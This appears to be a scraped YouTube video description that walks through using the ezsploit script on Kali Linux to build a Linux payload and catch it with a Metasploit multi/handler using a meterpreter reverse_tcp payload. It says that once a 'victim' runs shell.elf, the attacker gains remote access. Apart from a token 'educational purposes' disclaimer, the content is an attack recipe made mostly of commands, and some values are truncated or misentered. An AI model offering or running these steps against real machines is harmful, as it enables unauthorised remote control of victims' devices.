How to hack linux with ezsploit using kali linux 2017.3

CWX9uvtBIZo/default.jpg

How to hack linux with ezsploit using kali linux 2017.3 parrot etc
( ONLY FOR EDUCATIONAL PURPOSES !!! )
link https://github.com/rand0m1ze/ezsploit
commands
cd ...file...
chmod +x ezsploit.sh
./ezsploit.sh
'enter'
1
2
ip
port
- new terminal
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 192......
set lport 4444
exploit
When the victim run the shell.elf you will have remote access
on victim's linux device
...
THANK YOU FOR WATCHING
SUBSCRIBE
SHARE
LIKE
FOLLOW US ON INSTAGRAM
https://www.instagram.com/kali_linux_...

CWX9uvtBIZo/default.jpg
How to hack linux with ezsploit using kali linux 2017.3 How to hack linux with ezsploit using kali linux 2017.3 Reviewed by Anonymous on February 04, 2018 Rating: 5